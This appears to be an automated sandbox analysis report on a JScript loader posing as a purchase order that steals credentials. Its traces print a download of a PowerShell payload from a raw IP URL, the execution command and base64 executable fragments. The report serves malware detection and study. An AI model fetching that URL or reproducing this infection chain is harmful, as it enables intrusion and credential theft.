                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE284010_2_04BE2840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE29A010_2_04BE29A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04CAA9A610_2_04CAA9A6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BF696210_2_04BF6962
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BE995010_2_04BE9950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BFB95010_2_04BFB950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C8DAC610_2_04C8DAC6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BDEA8010_2_04BDEA80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C25AA010_2_04C25AA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C7DAAC10_2_04C7DAAC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9FA4910_2_04C9FA49
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C97A4610_2_04C97A46
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C53A6C10_2_04C53A6C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C96BD710_2_04C96BD7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C55BF010_2_04C55BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C1DBF910_2_04C1DBF9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BFFB8010_2_04BFFB80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9AB4010_2_04C9AB40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04C9FB7610_2_04C9FB76
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AD1FD010_2_00AD1FD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACB06010_2_00ACB060
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACD07010_2_00ACD070
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACB1A410_2_00ACB1A4
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACB1B010_2_00ACB1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACB1F910_2_00ACB1F9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AD567010_2_00AD5670
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AD388010_2_00AD3880
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AD387B10_2_00AD387B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACCE4710_2_00ACCE47
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACCE5010_2_00ACCE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AEBE5010_2_00AEBE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_048EE46710_2_048EE467
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_048EE7FC10_2_048EE7FC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_048ED8C810_2_048ED8C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02BCEA12 appears 84 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02BDF290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02BA7E54 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B95130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B4B970 appears 266 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 04C5F290 appears 105 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 04C15130 appears 36 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 04BCB970 appears 268 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 04C27E54 appears 90 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 04C4EA12 appears 86 times
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsInitial sample: Strings found which are bigger than 50
                Source: Process Memory Space: powershell.exe PID: 6440, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: x.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@12/8@5/5
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\laser[1].ps1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
                Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000003048000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2957256792.0000000003018000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3424407770.0000000003018000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2957256792.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3424407770.0000000003024000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsVirustotal: Detection: 16%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZXGZX.pdbBSJB source: powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmp, x.exe.3.dr
                Source: Binary string: runonce.pdbGCTL source: tgV1MsdzZ4.exe, 00000009.00000002.3425165000.00000000008AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2771061270.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2771057984.00000000049ED000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2768313392.000000000483C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2771061270.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000A.00000003.2771057984.00000000049ED000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2768313392.000000000483C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: tgV1MsdzZ4.exe, 00000009.00000002.3425165000.00000000008AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZXGZX.pdb source: powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmp, x.exe.3.dr
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tgV1MsdzZ4.exe, 00000009.00000002.3423549086.000000000006F000.00000002.00000001.01000000.0000000A.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3423390541.000000000006F000.00000002.00000001.01000000.0000000A.sdmp

                Data Obfuscation

                barindex
                JScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.Name();ITextStream.WriteLine(" entry:769 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:769 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:787 f:_0x144925 a0:427 a1:%22H!x!%22");ITextStream.WriteLine(" exit:787 f:_0x144925 r:%22CreateObject%22");ITextStream.WriteLine(" entry:793 f:_0x2f88bb a0:425");ITextStream.WriteLine(" exit:793 f:_0x2f88bb r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:783 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:783 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:802 f:_0x144925 a0:451 a1:%22pMPK%22");ITextStream.WriteLine(" exit:802 f:_0x144925 r:%22CreateObject%22");ITextStream.WriteLine(" entry:808 f:_0x2f88bb a0:415");ITextStream.WriteLine(" exit:808 f:_0x2f88bb r:%22MSXML2.XMLHTTP%22");IHost.Name();ITextStream.WriteLine(" entry:798 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:798 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1063 f:_0x144925 a0:428 a1:%22%25TRZ%22");ITextStream.WriteLine(" exit:1063 f:_0x144925 r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:1059 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:1059 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:1074 f:_0x2f88bb a0:436");ITextStream.WriteLine(" exit:1074 f:_0x2f88bb r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:1070 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:1070 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1285 f:DownloadScript a0:%22http%3A%2F%2F196.251.92.64%2Fcrypt%2Flaser.ps1%22 a1:%22C%3A%5CTemp%5Cdddddd.ps1%22");ITextStream.WriteLine(" exec:1080 f:DownloadScript");ITextStream.WriteLine(" entry:1098 f:_0x35b519 a0:449");ITextStream.WriteLine(" exit:1098 f:_0x35b519 r:%22Open%22");ITextStream.WriteLine(" entry:1103 f:_0x42ed36 a0:446 a1:%22ZQ%23t%22");ITextStream.WriteLine(" exit:1103 f:_0x42ed36 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:1094 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F196.251.92.64%2Fcrypt%2Flaser.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://196.251.92.64/crypt/laser.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:1094 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1115 f:_0x2937fd a0:420");ITextStream.WriteLine(" exit:1115 f
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAH
                Potential obfuscated javascript found
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsInitial file: High amount of function use 8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD345900BD pushad ; iretd 3_2_00007FFD345900C1
